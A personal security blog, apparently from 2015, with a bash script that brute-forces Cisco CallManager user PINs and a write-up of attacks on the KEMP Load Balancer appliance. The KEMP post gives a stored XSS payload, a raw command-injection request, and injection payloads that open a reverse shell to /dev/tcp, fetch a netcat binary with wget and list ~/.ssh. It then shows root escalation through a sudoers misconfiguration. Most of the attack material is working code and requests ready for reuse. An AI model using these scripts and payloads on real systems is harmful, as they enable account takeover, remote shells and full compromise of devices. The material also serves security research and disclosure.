Thursday 2 April 2015

PoC for Cracking Cisco PINs

As a follow up to the work done by Roberto SL here;

http://blog.malerisch.net/2012/10/callmanager-pin-bruteforce.html


I've gone ahead and wrote some quick-and-dirty PoC code for this.  Might be useful as a tool to remind people to use account lockout thresholds...

1:  #!/bin/bash  
2:  echo "Cisco VoIP Phone Pin Cracker, 2015 PWH"  
3:    
4:  if [ "$#" -eq 0 ]; then  
5:       echo "Usage: $0 <ip> <user-id>"  
6:       exit  
7:  fi  
8:    
9:  userid=$2  
10:  ccmip=$1  
11:    
12:  echo -e "Targeting user id $userid on $ccmip\n"   
13:  echo "Checking if already logged in... "  
14:  curl "https://$ccmip/ccmpd/pdCheckLogin.do?name=undefined" -ks | grep -q 'Personal Address Book'  
15:    
16:  if [ `echo $?` -eq 0 ]; then  
17:                           echo -n "+ IP already logged in, logging out... "  
18:                           curl -ks `curl -ks "\`curl "https://$ccmip/ccmpd/pdCheckLogin.do?name=undefined" -ks | grep LogoutPage | cut -d\> -f2 | cut -d\< -f1\`" | grep logout | cut -d\> -f2 | cut -d\< -f1` > /dev/null  
19:                           echo "Done"  
20:                      else  
21:                           echo "+ IP not logged in, proceeding to crack $userid..."  
22:                      fi  
23:    
24:  echo -ne "Grabbing a SID... "  
25:  SID=`curl "https://$ccmip/ccmpd/pdCheckLogin.do?name=undefined" -ks | grep sid | cut -d\= -f2 | cut -d\< -f1`  
26:  echo $SID  
27:    
28:  function authattempt {  
29:                      curl -ks "https://$ccmip/ccmpd/login.do?sid=$SID&userid=$userid&pin=$1" | grep -q 'Login Unsuccessful'  
30:                      if [ `echo $?` -eq 0 ]; then  
31:                           echo -ne "$1 didn't work\\r"  
32:                      else  
33:                           echo "$1 worked         "  
34:                           exit  
35:                      fi  
36:  }  
37:    
38:  echo "Testing user-id as PIN... "  
39:  authattempt $userid  
40:  echo "Testing common PINs... "  
41:  authattempt 1234  
42:  authattempt 4321  
43:  authattempt 0000  
44:  authattempt 1111  
45:  authattempt 2222  
46:  authattempt 3333  
47:  authattempt 4444  
48:  authattempt 5555  
49:  authattempt 6666  
50:  authattempt 7777  
51:  authattempt 8888  
52:  authattempt 9999  
53:  authattempt 0123  
54:  echo "Bruteforcing range... "  
55:  seq -f "%04.f" $rangeBegin $rangeEnd | while read line; do authattempt $line; done   
56:    

Breaking KEMP Load Balancer with Roberto...!

So back in October, Roberto SL and myself had a play with KEMP Load Balancer and found a whole load of issues with it :-)   On this version I had first-pass at it and found XSS (stored), Command Injection (with a lovely easy privesc up to root...) and that it was vulnerable to shellshock!  Happy days...

After this, Roberto really went to town on it and smashed it!  His main post is here:  http://blog.malerisch.net/2015/04/playing-with-kemp-load-master.html

Stored XSS in the MoTD


POST'ing to /progs/doconfig/setmotd with something like "testing</textarea><script>alert(1)</script>" works well and handily is presented to *every* user as soon as they login. 

Command Injection


POST /progs/doconfig/setmotd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://x.x.x.x/progs/doconfig/setmotd
Cookie: JSESSIONID=XXXX
Authorization: Basic XXXX==
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 22

motd='&motdsub=Set+MotD

The response to this contains the following string;
/usr/wui/progs/util.sh: eval: line 385: unexpected EOF while looking for matching `''
/usr/wui/progs/util.sh: eval: line 386: syntax error: unexpected end of file

This refers to the following function of bash script;
read_post()
{
        set -f
        eval ${1}=\'`post_read "$1" "$post"`\'
        set +f
}


Some working examples;
  • motd='\`a ls\`'&motdsub=Set+MotD    (meh)
  • motd='\`a bash --help\`'&motdsub=Set+MotD   (okay...)
  • motd='\`a ls -la ~/.ssh \`'&motdsub=Set+MotD    (heh) 
  • motd='\`a echo -e \'bash -i > /dev/tcp/x.x.x.x/4444 0<\\x261 2>\\x261\'\`'&motdsub=Set+MotD  (w00h00)
  • motd='\` cd /tmp; wget http://x.x.x.x/nc-static-exec \`'&motdsub=Set+MotD  (seriously...  this thing has wget installed...)

Privesc up on the box using poorly configured sudoers;

bash-3.00$ cat /etc/sudoers
# sudoers file.
#
# User privilege specification
Defaults        logfile=/dev/null,!syslog
root    ALL=(ALL) ALL
bal     ALL = NOPASSWD: /bin/mount, /bin/umount, /sbin/reboot, /sbin/killproc, /bin/date, /bin/cp, /bin/rm, /bin/chmod, /etc/rc.d/config, /etc/rc.d/rsync, /sbin/startproc, /sbin/hwclock, /bin/loadkeys, /sbin/ifconfig, /etc/rc.d/pull_config, /etc/rc.d/sslproxy, /etc/rc.d/iptables, /usr/bin/passwd, /bin/mv, /sbin/ntpdate
hsync   ALL = NOPASSWD: /etc/rc.d/config,/etc/rc.d/rsync,/sbin/hwclock,/usr/sbin/tsync,/bin/date
bash-3.00$ sudo /usr/bin/passwd root
New Password:XXXX
Reenter New Password: XXXX
Changing password for root.
bash-3.00$ su root -
Password: XXXX
pwd
/
touch testing
ls -la testing
-rw-r--r--  1 root root 0 Nov  4 10:50 testing

For anybody else wanting to check out the latest version of KEMP.... The KEMP vmware image can be freely downloaded from their website, alter the vmx file to include the line; 

bios.bootOrder = "ethernet5,ethernet2,cdrom,hdd,floppy"

..and boot off the kali live cd  (64 bit version is more useful as a lot of the custom binaries on the kemp build are 64 bit), then do the following to get the image open;
  1. mount the first sda partition in kali
  2. gunzip the initrd.gz
  3. mkdir initrdmount
  4. mount –o loop initrd initrdmount
  5. KEMP filesystem now free to explore…  :-)
 


Wednesday 1 April 2015

At last...!

This has been a long time coming but finally here's my blog.  First pointless point.